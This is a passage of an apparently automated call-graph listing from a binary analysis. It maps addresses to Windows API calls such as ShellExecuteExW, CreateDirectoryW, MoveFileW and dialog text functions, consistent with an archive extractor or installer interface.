7ff7b8f1f1b4 26456->26757 26458->26377 26463 7ff7b8f1c01f 26459->26463 26560 7ff7b8f1c4a2 26459->26560 26469 7ff7b8f0a008 58 API calls 26460->26469 26462 7ff7b8f1b116 26809 7ff7b8f0b2fc 99 API calls 26462->26809 26471 7ff7b8f0a008 58 API calls 26463->26471 26466 7ff7b8f1c9a4 163 API calls 26479 7ff7b8f1b509 26466->26479 26467 7ff7b8f1b131 26810 7ff7b8f1f3f8 33 API calls 26467->26810 26468 7ff7b8f1c51d 26468->26398 26473 7ff7b8f1b362 26469->26473 26476 7ff7b8f1c042 26471->26476 26472 7ff7b8f1c547 26477 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26472->26477 26483 7ff7b8ef12c0 33 API calls 26473->26483 26474 7ff7b8f1b535 26819 7ff7b8ef235c GetDlgItem EnableWindow 26474->26819 26475 7ff7b8f1b15a 26482 7ff7b8ef4cdc 33 API calls 26475->26482 26486 7ff7b8ef12c0 33 API calls 26476->26486 26480 7ff7b8f1c54c 26477->26480 26479->26474 26484 7ff7b8f1c9a4 163 API calls 26479->26484 26487 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26480->26487 26481 7ff7b8f1ac30 26481->26250 26481->26269 26485 7ff7b8f1b177 26482->26485 26494 7ff7b8f1b397 26483->26494 26484->26474 26491 7ff7b8ef1fa8 31 API calls 26485->26491 26488 7ff7b8f1c074 26486->26488 26489 7ff7b8f1c552 26487->26489 26490 7ff7b8ef1170 33 API calls 26488->26490 26495 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26489->26495 26492 7ff7b8f1c08f 26490->26492 26496 7ff7b8f1b1a2 26491->26496 26497 7ff7b8efd5bc 33 API calls 26492->26497 26493 7ff7b8f1b3f6 26498 7ff7b8ef1fa8 31 API calls 26493->26498 26494->26344 26494->26493 26499 7ff7b8f1c558 26495->26499 26811 7ff7b8ef2c5c 35 API calls _handle_error 26496->26811 26501 7ff7b8f1c0a6 26497->26501 26498->26234 26502 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26499->26502 26504 7ff7b8ef1fa8 31 API calls 26501->26504 26505 7ff7b8f1c55e 26502->26505 26503 7ff7b8f1b1b7 ShellExecuteExW 26510 7ff7b8f1b1d6 26503->26510 26506 7ff7b8f1c0b3 26504->26506 26507 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26505->26507 26506->26480 26508 7ff7b8ef1fa8 31 API calls 26506->26508 26509 7ff7b8f1c564 26507->26509 26511 7ff7b8f1c119 26508->26511 26516 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26509->26516 26512 7ff7b8f1b207 WaitForInputIdle 26510->26512 26513 7ff7b8f1b234 26510->26513 26514 7ff7b8ef2678 SetDlgItemTextW 26511->26514 26512->26513 26517 7ff7b8f1b21f 26512->26517 26522 7ff7b8ef1fa8 31 API calls 26513->26522 26515 7ff7b8f1c12d FindClose 26514->26515 26518 7ff7b8f1c238 SendDlgItemMessageW 26515->26518 26519 7ff7b8f1c149 26515->26519 26520 7ff7b8f1c56a 26516->26520 26812 7ff7b8ef2f50 15 API calls _handle_error 26517->26812 26525 7ff7b8f1c26c 26518->26525 26834 7ff7b8f19ac4 10 API calls _handle_error 26519->26834 26524 7ff7b8f1b255 26522->26524 26813 7ff7b8ef2c2c DisconnectNamedPipe CloseHandle 26524->26813 26530 7ff7b8f0a008 58 API calls 26525->26530 26526 7ff7b8f1c16c 26528 7ff7b8f0a008 58 API calls 26526->26528 26531 7ff7b8f1c175 26528->26531 26529 7ff7b8f1b263 26529->26314 26532 7ff7b8f1b29d 26529->26532 26533 7ff7b8f1c279 26530->26533 26534 7ff7b8f0d2bc 48 API calls 26531->26534 26535 7ff7b8ef1fa8 31 API calls 26532->26535 26537 7ff7b8ef12c0 33 API calls 26533->26537 26541 7ff7b8f1c192 BuildCatchObjectHelperInternal 26534->26541 26536 7ff7b8f1b2c3 26535->26536 26538 7ff7b8ef1fa8 31 API calls 26536->26538 26540 7ff7b8f1c2ab 26537->26540 26538->26388 26539 7ff7b8ef1fa8 31 API calls 26542 7ff7b8f1c224 26539->26542 26543 7ff7b8ef1170 33 API calls 26540->26543 26541->26489 26541->26539 26544 7ff7b8ef2678 SetDlgItemTextW 26542->26544 26545 7ff7b8f1c2c6 26543->26545 26544->26518 26546 7ff7b8efd5bc 33 API calls 26545->26546 26547 7ff7b8f1c2dd 26546->26547 26548 7ff7b8ef1fa8 31 API calls 26547->26548 26549 7ff7b8f1c2e9 BuildCatchObjectHelperInternal 26548->26549 26550 7ff7b8ef1fa8 31 API calls 26549->26550 26551 7ff7b8f1c323 26550->26551 26552 7ff7b8ef1fa8 31 API calls 26551->26552 26553 7ff7b8f1c330 26552->26553 26553->26499 26554 7ff7b8ef1fa8 31 API calls 26553->26554 26555 7ff7b8f1c396 26554->26555 26556 7ff7b8ef2678 SetDlgItemTextW 26555->26556 26557 7ff7b8f1c3aa 26556->26557 26557->26560 26835 7ff7b8f19ac4 10 API calls _handle_error 26557->26835 26559 7ff7b8f1c3d5 26561 7ff7b8f0a008 58 API calls 26559->26561 26560->26398 26560->26468 26560->26472 26560->26509 26562 7ff7b8f1c3df 26561->26562 26563 7ff7b8f0d2bc 48 API calls 26562->26563 26565 7ff7b8f1c3fc BuildCatchObjectHelperInternal 26563->26565 26564 7ff7b8ef1fa8 31 API calls 26566 7ff7b8f1c48e 26564->26566 26565->26505 26565->26564 26567 7ff7b8ef2678 SetDlgItemTextW 26566->26567 26567->26560 26569 7ff7b8ef274d 26568->26569 26570 7ff7b8ef26e2 26568->26570 26569->26211 26570->26569 26571 7ff7b8ef270c 26570->26571 26836 7ff7b8f096b4 26570->26836 26571->26569 26573 7ff7b8ef2721 GetDlgItem 26571->26573 26573->26569 26574 7ff7b8ef2734 26573->26574 26574->26569 26575 7ff7b8ef273b SetWindowTextW 26574->26575 26575->26569 26577 7ff7b8ef245c 26576->26577 26578 7ff7b8ef2497 26576->26578 26580 7ff7b8ef12c0 33 API calls 26577->26580 26579 7ff7b8ef255c 35 API calls 26578->26579 26581 7ff7b8ef248d BuildCatchObjectHelperInternal 26579->26581 26580->26581 26582 7ff7b8ef1fa8 31 API calls 26581->26582 26585 7ff7b8ef24ef 26581->26585 26582->26585 26583 7ff7b8ef252e 26584 7ff7b8f21d70 _handle_error 8 API calls 26583->26584 26586 7ff7b8ef2543 26584->26586 26585->26583 26587 7ff7b8ef2556 26585->26587 26586->26234 26586->26241 26586->26481 26588 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26587->26588 26589 7ff7b8ef255b 26588->26589 26900 7ff7b8f1a624 PeekMessageW 26590->26900 26593 7ff7b8f1e97b SendMessageW SendMessageW 26595 7ff7b8f1e9dc SendMessageW 26593->26595 26596 7ff7b8f1e9c1 26593->26596 26594 7ff7b8f1e92d 26597 7ff7b8f1e939 ShowWindow SendMessageW SendMessageW 26594->26597 26598 7ff7b8f1e9fb 26595->26598 26599 7ff7b8f1e9fe SendMessageW SendMessageW 26595->26599 26596->26595 26597->26593 26598->26599 26600 7ff7b8f1ea2b SendMessageW 26599->26600 26601 7ff7b8f1ea50 SendMessageW 26599->26601 26600->26601 26602 7ff7b8f21d70 _handle_error 8 API calls 26601->26602 26603 7ff7b8f1acf5 26602->26603 26603->26280 26603->26312 26610 7ff7b8f0245b 26604->26610 26612 7ff7b8f0234a 26604->26612 26605 7ff7b8f21d70 _handle_error 8 API calls 26606 7ff7b8f02471 26605->26606 26606->26347 26606->26348 26607 7ff7b8f02435 26608 7ff7b8f02a30 56 API calls 26607->26608 26607->26610 26608->26610 26609 7ff7b8ef12c0 33 API calls 26609->26612 26610->26605 26612->26607 26612->26609 26613 7ff7b8f02486 26612->26613 26905 7ff7b8f02a30 26612->26905 26614 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26613->26614 26615 7ff7b8f0248b 26614->26615 26617 7ff7b8ef4d09 26616->26617 26618 7ff7b8ef4d21 26617->26618 26619 7ff7b8ef12c0 33 API calls 26617->26619 26620 7ff7b8f21d70 _handle_error 8 API calls 26618->26620 26619->26618 26621 7ff7b8ef4d58 26620->26621 26621->26394 26623 7ff7b8f0156a 26622->26623 26624 7ff7b8f0159e 26623->26624 26625 7ff7b8f015b1 CreateFileW 26623->26625 26626 7ff7b8f01682 26624->26626 26628 7ff7b8f05d18 49 API calls 26624->26628 26625->26624 26627 7ff7b8ef3cac 33 API calls 26626->26627 26629 7ff7b8f0169f 26627->26629 26630 7ff7b8f0160c 26628->26630 26631 7ff7b8f21d70 _handle_error 8 API calls 26629->26631 26632 7ff7b8f01610 CreateFileW 26630->26632 26633 7ff7b8f01649 26630->26633 26634 7ff7b8f016b4 26631->26634 26632->26633 26633->26626 26635 7ff7b8f016c8 26633->26635 26634->26443 26634->26444 26636 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26635->26636 26637 7ff7b8f016cd 26636->26637 26735 7ff7b8f1ca1c BuildCatchObjectHelperInternal 26638->26735 26640 7ff7b8f1cd58 26641 7ff7b8ef1fa8 31 API calls 26640->26641 26642 7ff7b8f1cd61 26641->26642 26643 7ff7b8f21d70 _handle_error 8 API calls 26642->26643 26644 7ff7b8f1b4ca 26643->26644 26644->26452 26645 7ff7b8f1e763 27029 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 26645->27029 26647 7ff7b8ef8a94 33 API calls 26647->26735 26649 7ff7b8f1e769 26650 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26649->26650 26652 7ff7b8f1e76f 26650->26652 26651 7ff7b8f10ad8 CompareStringW 26651->26735 27030 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 26652->27030 26653 7ff7b8f1e757 26654 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26653->26654 26656 7ff7b8f1e75d 26654->26656 27028 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 26656->27028 26658 7ff7b8f1e775 26661 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26658->26661 26660 7ff7b8f1e6dd 26663 7ff7b8ef3cac 33 API calls 26660->26663 26664 7ff7b8f1e77b 26661->26664 26662 7ff7b8ef13c4 33 API calls 26666 7ff7b8f1d6f8 GetTempPathW 26662->26666 26669 7ff7b8f1e6ed 26663->26669 26672 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26664->26672 26665 7ff7b8f1e751 27027 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 26665->27027 26666->26735 26668 7ff7b8f055f8 35 API calls 26668->26735 27025 7ff7b8f1a48c 33 API calls 2 library calls 26669->27025 26673 7ff7b8f1e781 26672->26673 26678 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26673->26678 26675 7ff7b8ef268c SetWindowTextW 26675->26735 26676 7ff7b8f1e703 26681 7ff7b8ef1fa8 31 API calls 26676->26681 26682 7ff7b8f1e71a BuildCatchObjectHelperInternal 26676->26682 26677 7ff7b8f2aaac 43 API calls 26677->26735 26683 7ff7b8f1e787 26678->26683 26680 7ff7b8ef2044 33 API calls 26680->26735 26681->26682 27026 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26682->27026 26686 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26683->26686 26684 7ff7b8f21c20 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 26684->26735 26689 7ff7b8f1e78d 26686->26689 26687 7ff7b8f1a48c 33 API calls 26687->26735 26688 7ff7b8ef3cac 33 API calls 26688->26735 26696 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26689->26696 26690 7ff7b8ef4cdc 33 API calls 26690->26735 26691 7ff7b8f1e7a5 27033 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 26691->27033 26692 7ff7b8f1e7b1 27035 7ff7b8ef200c 33 API calls std::_Xinvalid_argument 26692->27035 26694 7ff7b8ef20c0 33 API calls 26694->26735 26695 7ff7b8ef3cac 33 API calls 26732 7ff7b8f1cfd2 26695->26732 26701 7ff7b8f1e793 26696->26701 26697 7ff7b8f04ba8 33 API calls 26697->26735 26698 7ff7b8f1e7ab 27034 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26698->27034 26715 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26701->26715 26702 7ff7b8f1e79f 27032 7ff7b8ef1f88 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26702->27032 26703 7ff7b8ef1fa8 31 API calls 26703->26735 26705 7ff7b8f1e799 27031 7ff7b8ef6ddc 47 API calls BuildCatchObjectHelperInternal 26705->27031 26710 7ff7b8f03108 51 API calls 26710->26735 26713 7ff7b8f1d103 GetDlgItem 26717 7ff7b8ef268c SetWindowTextW 26713->26717 26714 7ff7b8f0d440 33 API calls 26714->26732 26715->26705 26721 7ff7b8f1d122 SendMessageW 26717->26721 26719 7ff7b8f0caf0 33 API calls 26719->26735 26720 7ff7b8f04ee4 53 API calls 26720->26735 26721->26732 26723 7ff7b8f04e2c 33 API calls 26723->26735 26725 7ff7b8f1d156 SendMessageW 26725->26732 26727 7ff7b8f032ac 54 API calls 26727->26735 26730 7ff7b8f1d41a SHFileOperationW 26730->26735 26731 7ff7b8ef1754 33 API calls 26731->26730 26732->26695 26732->26714 26732->26725 26733 7ff7b8ef1fa8 31 API calls 26732->26733 26732->26735 26987 7ff7b8efd3ac 47 API calls BuildCatchObjectHelperInternal 26732->26987 26988 7ff7b8f1a114 33 API calls _invalid_parameter_noinfo_noreturn 26732->26988 26989 7ff7b8f04e2c 26732->26989 26993 7ff7b8f18d78 33 API calls 26732->26993 26994 7ff7b8f1923c 31 API calls BuildCatchObjectHelperInternal 26732->26994 26995 7ff7b8f19d04 116 API calls 2 library calls 26732->26995 26733->26732 26734 7ff7b8f0266c 51 API calls 26734->26735 26735->26640 26735->26645 26735->26647 26735->26649 26735->26651 26735->26652 26735->26653 26735->26656 26735->26658 26735->26660 26735->26662 26735->26664 26735->26665 26735->26668 26735->26673 26735->26675 26735->26677 26735->26680 26735->26682 26735->26683 26735->26684 26735->26687 26735->26688 26735->26689 26735->26690 26735->26691 26735->26692 26735->26694 26735->26697 26735->26698 26735->26701 26735->26702 26735->26703 26735->26705 26735->26710 26735->26719 26735->26720 26735->26723 26735->26727 26735->26730 26735->26731 26735->26732 26735->26734 26736 7ff7b8efd5bc 33 API calls 26735->26736 26738 7ff7b8f070b0 47 API calls 26735->26738 26739 7ff7b8ef2678 SetDlgItemTextW 26735->26739 26740 7ff7b8ef1170 33 API calls 26735->26740 26746 7ff7b8f02680 51 API calls 26735->26746 26747 7ff7b8f1da55 EndDialog 26735->26747 26748 7ff7b8f1d5fb MoveFileW 26735->26748 26749 7ff7b8ef12c0 33 API calls 26735->26749 26753 7ff7b8f02314 56 API calls 26735->26753 26756 7ff7b8f1febc 31 API calls 26735->26756 26939 7ff7b8f1a2c4 26735->26939 26943 7ff7b8f1ed28 26735->26943 26983 7ff7b8f0c888 35 API calls _invalid_parameter_noinfo_noreturn 26735->26983 26984 7ff7b8f18e14 33 API calls Concurrency::cancel_current_task 26735->26984 26985 7ff7b8f1ff00 31 API calls _invalid_parameter_noinfo_noreturn 26735->26985 26986 7ff7b8f1923c 31 API calls BuildCatchObjectHelperInternal 26735->26986 26996 7ff7b8f0666c 33 API calls 2 library calls 26735->26996 26997 7ff7b8f03404 33 API calls 26735->26997 26998 7ff7b8f058b4 33 API calls 3 library calls 26735->26998 26999 7ff7b8f065d0 26735->26999 27003 7ff7b8f0257c 26735->27003 27017 7ff7b8f0321c FindClose 26735->27017 27018 7ff7b8f10b08 CompareStringW 26735->27018 27019 7ff7b8f1954c 47 API calls 26735->27019 27020 7ff7b8f1805c 51 API calls 3 library calls 26735->27020 27021 7ff7b8f1a410 33 API calls _handle_error 26735->27021 27022 7ff7b8f04e8c CompareStringW 26735->27022 27023 7ff7b8f07170 47 API calls 26735->27023 27024 7ff7b8f0d440 33 API calls 26735->27024 26736->26735 26738->26735 26739->26735 26740->26735 26746->26735 26747->26735 26750 7ff7b8f1d638 MoveFileExW 26748->26750 26751 7ff7b8f1d65c 26748->26751 26749->26735 26750->26751 26752 7ff7b8ef1fa8 31 API calls 26751->26752 26752->26735 26753->26735 26756->26735 26758 7ff7b8ef20c0 33 API calls 26757->26758 26759 7ff7b8f1f1ea 26758->26759 27043 7ff7b8f0d318 26759->27043 26761 7ff7b8f1f1fd 26762 7ff7b8ef3cac 33 API calls 26761->26762 26763 7ff7b8f1f20c 26762->26763 27047 7ff7b8ef8f84 26763->27047 26765 7ff7b8f1f21b 27051 7ff7b8efd7a4 26765->27051 26767 7ff7b8f1f269 27071 7ff7b8efdc48 26767->27071 26769 7ff7b8f1f274 26770 7ff7b8f21d70 _handle_error 8 API calls 26769->26770 26771 7ff7b8f1b4f1 26770->26771 26771->26466 26773 7ff7b8f17d20 4 API calls 26772->26773 26774 7ff7b8f1ec07 26773->26774 26775 7ff7b8f1ecff 26774->26775 26776 7ff7b8f1ec0f GetWindow 26774->26776 26777 7ff7b8f21d70 _handle_error 8 API calls 26775->26777 26781 7ff7b8f1ec2a 26776->26781 26778 7ff7b8f1b8e5 26777->26778 26778->26222 26778->26223 26779 7ff7b8f1ec36 GetClassNameW 28148 7ff7b8f10ad8 CompareStringW 26779->28148 26781->26775 26781->26779 26782 7ff7b8f1ecde GetWindow 26781->26782 26783 7ff7b8f1ec5f GetWindowLongPtrW 26781->26783 26782->26775 26782->26781 26783->26782 26784 7ff7b8f1ec71 SendMessageW 26783->26784 26784->26782 26785 7ff7b8f1ec8d GetObjectW 26784->26785 28149 7ff7b8f17d88 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26785->28149 26787 7ff7b8f1eca9 26788 7ff7b8f17d50 4 API calls 26787->26788 28150 7ff7b8f18690 16 API calls _handle_error 26787->28150 26788->26787 26790 7ff7b8f1ecc1 SendMessageW DeleteObject 26790->26782 26792 7ff7b8ef2696 SetWindowTextW 26791->26792 26793 7ff7b8ef2693 26791->26793 26794 7ff7b8f5e2e8 26792->26794 26793->26792 26795->26245 26797 7ff7b8ef2682 SetDlgItemTextW 26796->26797 26798 7ff7b8ef267f 26796->26798 26798->26797 26799->26271 26800->26311 26802 7ff7b8f02680 51 API calls 26801->26802 26803 7ff7b8f02675 26802->26803 26803->26322 26803->26352 26804->26322 26805->26409 26806->26442 26807->26453 26808->26462 26809->26467 26810->26475 26811->26503 26812->26513 26813->26529 26814->26401 26816 7ff7b8ef1197 26815->26816 26817 7ff7b8ef2044 33 API calls 26816->26817 26818 7ff7b8ef11a5 BuildCatchObjectHelperInternal 26817->26818 26818->26414 26820 7ff7b8f5e2f0 26819->26820 26822 7ff7b8ef13c4 33 API calls 26821->26822 26823 7ff7b8ef25c9 GetWindowTextW 26822->26823 26824 7ff7b8ef25fe 26823->26824 26825 7ff7b8ef12c0 33 API calls 26824->26825 26826 7ff7b8ef260c 26825->26826 26829 7ff7b8ef266f 26826->26829 26830 7ff7b8ef2647 26826->26830 26827 7ff7b8f21d70 _handle_error 8 API calls 26828 7ff7b8ef265d 26827->26828 26828->26299 26831 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26829->26831 26830->26827 26832 7ff7b8ef2674 26831->26832 26833->26439 26834->26526 26835->26559 26837 7ff7b8f09d6c swprintf 46 API calls 26836->26837 26838 7ff7b8f09713 26837->26838 26839 7ff7b8f1055c WideCharToMultiByte 26838->26839 26842 7ff7b8f09723 26839->26842 26840 7ff7b8f09799 26863 7ff7b8f08638 26840->26863 26842->26840 26853 7ff7b8f08a34 31 API calls 26842->26853 26857 7ff7b8f09777 SetDlgItemTextW 26842->26857 26844 7ff7b8f09811 26846 7ff7b8f09819 GetWindowLongPtrW 26844->26846 26847 7ff7b8f09910 GetSystemMetrics GetWindow 26844->26847 26845 7ff7b8f098d3 26845->26847 26878 7ff7b8f087e0 26845->26878 26848 7ff7b8f5e2c0 26846->26848 26850 7ff7b8f09aa6 26847->26850 26860 7ff7b8f0993d 26847->26860 26851 7ff7b8f098bb GetWindowRect 26848->26851 26854 7ff7b8f21d70 _handle_error 8 API calls 26850->26854 26851->26845 26853->26842 26856 7ff7b8f09ab5 26854->26856 26855 7ff7b8f09900 SetWindowTextW 26855->26847 26856->26571 26857->26842 26858 7ff7b8f09959 GetWindowRect 26887 7ff7b8ef22c8 26858->26887 26860->26850 26860->26858 26861 7ff7b8f09a83 GetWindow 26860->26861 26862 7ff7b8f09a29 SendMessageW 26860->26862 26861->26850 26861->26860 26862->26860 26864 7ff7b8f087e0 47 API calls 26863->26864 26867 7ff7b8f0867f 26864->26867 26865 7ff7b8f08790 26866 7ff7b8f21d70 _handle_error 8 API calls 26865->26866 26868 7ff7b8f087c4 GetWindowRect GetClientRect 26866->26868 26867->26865 26869 7ff7b8ef12c0 33 API calls 26867->26869 26868->26844 26868->26845 26870 7ff7b8f086cf 26869->26870 26871 7ff7b8f087d7 26870->26871 26873 7ff7b8ef12c0 33 API calls 26870->26873 26872 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26871->26872 26874 7ff7b8f087dd 26872->26874 26875 7ff7b8f0874a 26873->26875 26875->26865 26876 7ff7b8f087d2 26875->26876 26877 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26876->26877 26877->26871 26879 7ff7b8f09d6c swprintf 46 API calls 26878->26879 26880 7ff7b8f08823 26879->26880 26881 7ff7b8f1055c WideCharToMultiByte 26880->26881 26882 7ff7b8f0883b 26881->26882 26883 7ff7b8f08a34 31 API calls 26882->26883 26884 7ff7b8f08853 26883->26884 26885 7ff7b8f21d70 _handle_error 8 API calls 26884->26885 26886 7ff7b8f08863 26885->26886 26886->26847 26886->26855 26894 7ff7b8ef2380 GetClassNameW 26887->26894 26889 7ff7b8ef22f1 26890 7ff7b8ef1fa8 31 API calls 26889->26890 26891 7ff7b8ef2340 26890->26891 26892 7ff7b8f21d70 _handle_error 8 API calls 26891->26892 26893 7ff7b8ef2350 26892->26893 26893->26860 26895 7ff7b8ef23e8 26894->26895 26896 7ff7b8ef12c0 33 API calls 26895->26896 26897 7ff7b8ef23f6 26896->26897 26898 7ff7b8f21d70 _handle_error 8 API calls 26897->26898 26899 7ff7b8ef2409 26898->26899 26899->26889 26901 7ff7b8f1a688 GetDlgItem 26900->26901 26902 7ff7b8f1a644 GetMessageW 26900->26902 26901->26593 26901->26594 26903 7ff7b8f1a672 TranslateMessage DispatchMessageW 26902->26903 26904 7ff7b8f1a663 IsDialogMessageW 26902->26904 26903->26901 26904->26901 26904->26903 26907 7ff7b8f02a5f 26905->26907 26906 7ff7b8f02a8c 26909 7ff7b8f02680 51 API calls 26906->26909 26907->26906 26908 7ff7b8f02a78 CreateDirectoryW 26907->26908 26908->26906 26910 7ff7b8f02b2c 26908->26910 26911 7ff7b8f02a9a 26909->26911 26912 7ff7b8f02b3c 26910->26912 26925 7ff7b8f03108 26910->26925 26913 7ff7b8f02b40 GetLastError 26911->26913 26915 7ff7b8f05d18 49 API calls 26911->26915 26916 7ff7b8f21d70 _handle_error 8 API calls 26912->26916 26913->26912 26917 7ff7b8f02acb 26915->26917 26918 7ff7b8f02b68 26916->26918 26919 7ff7b8f02acf CreateDirectoryW 26917->26919 26920 7ff7b8f02aea 26917->26920 26918->26612 26919->26920 26921 7ff7b8f02b7d 26920->26921 26922 7ff7b8f02b23 26920->26922 26923 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26921->26923 26922->26910 26922->26913 26924 7ff7b8f02b82 26923->26924 26926 7ff7b8f03132 SetFileAttributesW 26925->26926 26927 7ff7b8f0312f 26925->26927 26928 7ff7b8f03148 26926->26928 26935 7ff7b8f031cc 26926->26935 26927->26926 26930 7ff7b8f05d18 49 API calls 26928->26930 26929 7ff7b8f21d70 _handle_error 8 API calls 26931 7ff7b8f031e1 26929->26931 26932 7ff7b8f03170 26930->26932 26931->26912 26933 7ff7b8f03174 SetFileAttributesW 26932->26933 26934 7ff7b8f03193 26932->26934 26933->26934 26934->26935 26936 7ff7b8f031f1 26934->26936 26935->26929 26937 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26936->26937 26938 7ff7b8f031f6 26937->26938 26940 7ff7b8f1a2eb 26939->26940 26941 7ff7b8f1a2f2 26939->26941 26940->26735 26941->26940 26942 7ff7b8ef1754 33 API calls 26941->26942 26942->26941 26948 7ff7b8f1ed71 memcpy_s 26943->26948 26963 7ff7b8f1f0bf 26943->26963 26944 7ff7b8ef1fa8 31 API calls 26945 7ff7b8f1f0de 26944->26945 26946 7ff7b8f21d70 _handle_error 8 API calls 26945->26946 26947 7ff7b8f1f0ea 26946->26947 26947->26735 26949 7ff7b8f1eecb 26948->26949 27036 7ff7b8f10ad8 CompareStringW 26948->27036 26951 7ff7b8ef12c0 33 API calls 26949->26951 26952 7ff7b8f1ef0a 26951->26952 26953 7ff7b8f0266c 51 API calls 26952->26953 26954 7ff7b8f1ef14 26953->26954 26955 7ff7b8ef1fa8 31 API calls 26954->26955 26959 7ff7b8f1ef1f 26955->26959 26956 7ff7b8f1ef8f ShellExecuteExW 26957 7ff7b8f1f088 26956->26957 26958 7ff7b8f1efa2 26956->26958 26957->26963 26968 7ff7b8f1f13d 26957->26968 26960 7ff7b8f1efdb WaitForInputIdle 26958->26960 26961 7ff7b8f1efc1 IsWindowVisible 26958->26961 26964 7ff7b8f1f02d CloseHandle 26958->26964 26959->26956 26962 7ff7b8ef12c0 33 API calls 26959->26962 26966 7ff7b8f1f638 5 API calls 26960->26966 26961->26960 26965 7ff7b8f1efce ShowWindow 26961->26965 26967 7ff7b8f1ef64 26962->26967 26963->26944 26972 7ff7b8f1f03c 26964->26972 26976 7ff7b8f1f04b 26964->26976 26965->26960 26969 7ff7b8f1eff3 26966->26969 27037 7ff7b8f04ee4 53 API calls 2 library calls 26967->27037 26971 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 26968->26971 26969->26964 26977 7ff7b8f1f001 GetExitCodeProcess 26969->26977 26974 7ff7b8f1f142 26971->26974 27038 7ff7b8f10ad8 CompareStringW 26972->27038 26973 7ff7b8f1ef72 26978 7ff7b8ef1fa8 31 API calls 26973->26978 26976->26957 26979 7ff7b8f1f079 ShowWindow 26976->26979 26977->26964 26980 7ff7b8f1f014 26977->26980 26981 7ff7b8f1ef7c 26978->26981 26979->26957 26980->26964 26981->26956 26983->26735 26984->26735 26985->26735 26986->26735 26987->26732 26988->26732 26990 7ff7b8f04e5f 26989->26990 26991 7ff7b8f04e3c 26989->26991 26990->26732 26991->26990 26992 7ff7b8ef1754 33 API calls 26991->26992 26992->26990 26993->26732 26994->26732 26995->26713 26996->26735 26997->26735 26998->26735 27000 7ff7b8f065ee 26999->27000 27039 7ff7b8efab08 27000->27039 27004 7ff7b8f025a4 27003->27004 27005 7ff7b8f025a7 DeleteFileW 27003->27005 27004->27005 27006 7ff7b8f025bd 27005->27006 27013 7ff7b8f0263f 27005->27013 27008 7ff7b8f05d18 49 API calls 27006->27008 27007 7ff7b8f21d70 _handle_error 8 API calls 27009 7ff7b8f02654 27007->27009 27010 7ff7b8f025e5 27008->27010 27009->26735 27011 7ff7b8f02606 27010->27011 27012 7ff7b8f025e9 DeleteFileW 27010->27012 27011->27013 27014 7ff7b8f02664 27011->27014 27012->27011 27013->27007 27015 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27014->27015 27016 7ff7b8f02669 27015->27016 27018->26735 27019->26735 27020->26735 27021->26735 27022->26735 27023->26735 27024->26735 27025->26676 27028->26645 27029->26649 27030->26658 27031->26702 27036->26949 27037->26973 27038->26976 27042 7ff7b8efab52 memcpy_s 27039->27042 27040 7ff7b8f21d70 _handle_error 8 API calls 27041 7ff7b8efabe9 27040->27041 27041->26735 27042->27040 27044 7ff7b8f0d34a 27043->27044 27045 7ff7b8ef2164 33 API calls 27044->27045 27046 7ff7b8f0d35e wcscpy 27045->27046 27046->26761 27048 7ff7b8f0d308 27047->27048 27049 7ff7b8ef2164 33 API calls 27048->27049 27050 7ff7b8f0d35e wcscpy 27049->27050 27050->26765 27085 7ff7b8f0793c 27051->27085 27053 7ff7b8efd823 27091 7ff7b8efda84 31 API calls BuildCatchObjectHelperInternal 27053->27091 27055 7ff7b8efd940 27058 7ff7b8f21c20 4 API calls 27055->27058 27056 7ff7b8efd9cc 27059 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27056->27059 27057 7ff7b8efd8be 27057->27055 27057->27056 27060 7ff7b8efd95c 27058->27060 27068 7ff7b8efd9d1 27059->27068 27092 7ff7b8f1294c 99 API calls 27060->27092 27062 7ff7b8efd989 27065 7ff7b8f21d70 _handle_error 8 API calls 27062->27065 27063 7ff7b8f00cce 27064 7ff7b8f00d19 27063->27064 27069 7ff7b8f26834 _invalid_parameter_noinfo_noreturn 31 API calls 27063->27069 27064->26767 27067 7ff7b8efd9b0 27065->27067 27066 7ff7b8ef1fa8 31 API calls 27066->27068 27067->26767 27068->27063 27068->27064 27068->27066 27070 7ff7b8f00d47 27069->27070 27072 7ff7b8efdc8a 27071->27072 27073 7ff7b8efdd44 27072->27073 27075 7ff7b8efdd07 27072->27075 27093 7ff7b8f03244 27072->27093 27083 7ff7b8efddaa 27073->27083 27100 7ff7b8efea34 27073->27100 27075->27073 27076 7ff7b8efde3d 27075->27076 27077 7ff7b8f26834 